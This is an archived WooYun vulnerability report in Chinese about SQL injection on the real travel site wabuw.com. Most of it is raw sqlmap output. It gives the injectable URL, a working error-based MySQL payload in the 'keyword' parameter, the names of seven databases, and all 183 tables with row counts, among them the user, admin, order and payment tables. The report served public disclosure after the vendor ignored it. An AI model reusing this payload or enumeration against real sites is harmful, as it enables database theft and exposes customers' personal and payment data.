乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-19: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-11-03: 厂商已经主动忽略漏洞,细节向公众公开
权6 pr4蛙步旅游网注入点打包泄露 过万用户信息 账户里面有钱管理员信息订单信息————————————————————————
注入点
http://www.wabuw.com/search-line/?keyword=大连
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: keyword (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: keyword=大连" AND (SELECT 4408 FROM(SELECT COUNT(*),CONCAT(0x7178786a71,(SELECT (ELT(4408=4408,1))),0x7176707a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "Fgzi"="Fgzi---web application technology: PHP 5.2.14back-end DBMS: MySQL >= 5.0.0available databases [7]:[*] binlog[*] information_schema[*] kekedb[*] mysql[*] test[*] visit[*] wabuwsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: keyword (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: keyword=大连" AND (SELECT 4408 FROM(SELECT COUNT(*),CONCAT(0x7178786a71,(SELECT (ELT(4408=4408,1))),0x7176707a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND "Fgzi"="Fgzi---web application technology: PHP 5.2.14back-end DBMS: MySQL >= 5.0.0Database: wabuw[183 tables]+--------------------------------+| wabu__attr || wabu_about || wabu_accounting || wabu_address_book || wabu_address_book_dept || wabu_admin || wabu_admin_access || wabu_admin_group || wabu_admin_keyword || wabu_admin_log || wabu_admin_menus || wabu_admin_module || wabu_admin_module_group || wabu_advertisements || wabu_affixproduct || wabu_anchor || wabu_beforeque || wabu_black || wabu_blacktext || wabu_buyproducts || wabu_buyproducts_ccr_relation || wabu_caigou_car || wabu_caigou_contact || wabu_caigou_hotel || wabu_caigou_hotelprice || wabu_caigou_kind || wabu_caigou_lave || wabu_caigou_line || wabu_caigou_lineprice || wabu_caigou_other || wabu_caigou_ticket || wabu_caigou_visa || wabu_car || wabu_car_img_relation || wabu_category || wabu_category_attr || wabu_category_hotel || wabu_category_info || wabu_category_jd || wabu_category_line || wabu_city || wabu_class || wabu_class_attr || wabu_class_category_relation || wabu_class_relation || wabu_comment || wabu_content_ccr_relation || wabu_cruiseship || wabu_cruiseship_img_relation || wabu_cruiseship_line || wabu_cruiseship_pack || wabu_cruiseship_room || wabu_cruiseshiproom_price || wabu_departurecity || wabu_freeline_car_relation || wabu_freeline_price || wabu_freeline_room_relation || wabu_freeline_singleroom || wabu_groupbooking || wabu_help || wabu_hotel || wabu_hotel_ccr_relation || wabu_hotel_room || wabu_hotel_tag_relation || wabu_image || wabu_indexflash || wabu_info || wabu_info_ccr_relation || wabu_info_snap || wabu_info_tag_relation || wabu_keyword || wabu_kite || wabu_knowledge || wabu_knowledge_ccr_relation || wabu_landscape || wabu_landscape_ccr_relation || wabu_landscape_img_relation || wabu_landscape_snap || wabu_landscape_tag_relation || wabu_lave_payment || wabu_lave_paymented || wabu_laveorder_payment || wabu_laveorder_paymented || wabu_line || wabu_line_affix_relation || wabu_line_append || wabu_line_attr || wabu_line_ccr_relation || wabu_line_collection || wabu_line_groupprice || wabu_line_img_relation || wabu_line_search || wabu_line_setcarsprice || wabu_line_special || wabu_line_zifei || wabu_linecodot || wabu_linefreeman || wabu_linefreemanprice || wabu_linegbook || wabu_linehotelpack || wabu_linehotelprice || wabu_lineprice || wabu_link || wabu_lnvoice || wabu_mailrelation || wabu_mailsubscription || wabu_meetinginfo || wabu_meetingplace || wabu_meetingplace_img_relation || wabu_message || wabu_neworders || wabu_option || wabu_order_car || wabu_order_contents || wabu_order_contract || wabu_order_contract_type || wabu_order_coupon || wabu_order_groupon || wabu_order_invoice || wabu_order_lave || wabu_order_member || wabu_order_num || wabu_order_other || wabu_order_pact || wabu_order_payment || wabu_order_paymented || wabu_order_room || wabu_order_status || wabu_order_team || wabu_order_ticket || wabu_order_ticketcard || wabu_orderlave_v || wabu_other_payment || wabu_payment_refund || wabu_phone_base || wabu_phone_pack || wabu_phone_pack_template || wabu_process || wabu_question || wabu_receipt || wabu_redeem || wabu_relation_attr || wabu_remind || wabu_search_keyword || wabu_seo || wabu_siteevalucation || wabu_sorce || wabu_stationletters || wabu_statistics || wabu_status || wabu_status_child || wabu_stymsms || wabu_subject || wabu_supplier || wabu_supplier_contact || wabu_supplier_hotelprice || wabu_supplier_kind || wabu_supplier_lineprice || wabu_sys_deduct || wabu_sys_deductgroup || wabu_table_attr || wabu_tag || wabu_tags || wabu_tem_class || wabu_tem_landscape_area || wabu_tour_base || wabu_tour_pack || wabu_tour_pack_hotel || wabu_tour_pack_hotel1 || wabu_tour_ticket_template || wabu_travel || wabu_tuan_juan || wabu_tuan_orders || wabu_user || wabu_user_attribution || wabu_user_consult || wabu_userquestion || wabu_visa || wabu_visa_ccr_relation || wabu_visaorder || wabu_website || wabu_weixin_class || wabu_weixin_line |+--------------------------------+Database: wabuw+-------------------------------+---------+| Table | Entries |+-------------------------------+---------+| wabu_stymsms | 168360 || wabu_landscape_ccr_relation | 133411 || wabu_info_ccr_relation | 96055 || wabu_image | 60917 || wabu_lineprice | 55692 || wabu_neworders | 52838 || wabu_order_contents | 50155 || wabu_landscape_img_relation | 36951 || wabu_user | 31048 || wabu_order_status | 27790 || wabu_line_img_relation | 25998 || wabu_line_ccr_relation | 23978 || wabu_info_tag_relation | 22167 || wabu_admin_keyword | 20250 || wabu_linehotelprice | 19823 || wabu_class_category_relation | 19608 || wabu_linefreemanprice | 19384 || wabu_message | 19338 || wabu_kite | 19258 || wabu_sorce | 17532 || wabu_order_lave | 16936 || wabu_comment | 15044 || wabu_seo | 14460 || wabu_travel | 13788 || wabu_order_member | 13278 || wabu_order_payment | 12008 || wabu_info | 9443 || wabu_orderlave_v | 9429 || wabu_laveorder_payment | 9107 || wabu_category_jd | 8645 || wabu_order_coupon | 8000 || wabu_stationletters | 7924 || wabu_class_attr | 7684 || wabu_landscape | 6823 || wabu_user_consult | 5916 || wabu_order_contract | 5327 || wabu_order_pact | 4738 || wabu_order_invoice | 4473 || wabu_hotel_ccr_relation | 4342 || wabu_city | 3683 || wabu_laveorder_paymented | 3431 || wabu_hotel_room | 3401 || wabu_lave_payment | 3224 || wabu_category_info | 2713 || wabu_other_payment | 2710 || wabu_line | 2590 || wabu_tag | 2540 || wabu_supplier_contact | 2490 || wabu_line_search | 2457 || wabu_supplier_lineprice | 2416 || wabu_admin_access | 2271 || wabu_category_line | 1902 || wabu_caigou_contact | 1811 || wabu_tem_class | 1618 || wabu_keyword | 1544 || wabu_blacktext | 1352 || wabu_accounting | 1343 || wabu_phone_pack | 1230 || wabu_supplier | 1197 || wabu_question | 1186 || wabu_hotel | 1104 || wabu_visa_ccr_relation | 1070 || wabu_class | 1035 || wabu_admin_log | 876 || wabu_tour_pack_hotel | 821 || wabu_sys_deduct | 752 || wabu_cruiseshiproom_price | 735 || wabu_linefreeman | 571 || wabu_cruiseship_img_relation | 556 || wabu_tour_pack_hotel1 | 532 || wabu_caigou_lave | 525 || wabu_weixin_line | 497 || wabu_tour_ticket_template | 464 || wabu_admin_module | 433 || wabu_landscape_tag_relation | 431 || wabu_tour_pack | 401 || wabu_payment_refund | 323 || wabu_knowledge | 309 || wabu_caigou_hotel | 307 || wabu_subject | 304 || wabu_phone_base | 249 || wabu_advertisements | 242 || wabu_category | 242 || wabu_hotel_tag_relation | 209 || wabu_status_child | 208 || wabu_lave_paymented | 190 || wabu_order_car | 178 || wabu_order_room | 166 || wabu_cruiseship | 164 || wabu_visa | 149 || wabu_weixin_class | 145 || wabu_option | 142 || wabu_supplier_kind | 142 || wabu_linehotelpack | 135 || wabu_supplier_hotelprice | 135 || wabu_line_setcarsprice | 130 || wabu_help | 124 || wabu_link | 121 || wabu_category_hotel | 117 || wabu_lnvoice | 105 || wabu_order_ticketcard | 100 || wabu_search_keyword | 97 || wabu_relation_attr | 92 || wabu_linecodot | 91 || wabu_anchor | 85 || wabu_cruiseship_pack | 83 || wabu_cruiseship_line | 79 || wabu_order_ticket | 72 || wabu_line_special | 71 || wabu_tem_landscape_area | 68 || wabu_cruiseship_room | 67 || wabu_indexflash | 64 || wabu_groupbooking | 62 || wabu_line_groupprice | 59 || wabu_freeline_price | 56 || wabu_redeem | 56 || wabu_order_paymented | 53 || wabu_caigou_hotelprice | 52 || wabu_admin | 47 || wabu_about | 45 || wabu_address_book | 41 || wabu_black | 40 || wabu_meetinginfo | 37 || wabu_caigou_car | 36 || wabu_order_team | 35 || wabu_freeline_car_relation | 33 || wabu_admin_module_group | 32 || wabu_car_img_relation | 30 || wabu_siteevalucation | 23 || wabu_status | 23 || wabu_knowledge_ccr_relation | 22 || wabu_caigou_other | 21 || wabu_tuan_orders | 20 || wabu_admin_group | 19 || wabu_receipt | 17 || wabu_buyproducts_ccr_relation | 16 || wabu_line_affix_relation | 16 || wabu_line_zifei | 16 || wabu_info_snap | 15 || wabu_process | 14 || wabu_order_groupon | 13 || wabu_userquestion | 13 || wabu_caigou_ticket | 12 || wabu_order_other | 12 || wabu_tour_base | 12 || wabu_tuan_juan | 12 || wabu_freeline_room_relation | 10 || wabu_beforeque | 9 || wabu_car | 9 || wabu_buyproducts | 8 || wabu_visaorder | 8 || wabu_affixproduct | 7 || wabu_user_attribution | 7 || wabu_departurecity | 6 || wabu_freeline_singleroom | 6 || wabu_mailrelation | 6 || wabu_tags | 6 || wabu_address_book_dept | 5 || wabu_line_append | 5 || wabu_line_collection | 5 || wabu_category_attr | 4 || wabu_landscape_snap | 3 || wabu_order_contract_type | 3 || wabu_order_num | 3 || wabu_caigou_kind | 2 || wabu_linegbook | 2 || wabu_mailsubscription | 2 || wabu_caigou_visa | 1 || wabu_class_relation | 1 || wabu_meetingplace | 1 || wabu_phone_pack_template | 1 || wabu_website | 1 |+-------------------------------+---------+
- -
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)
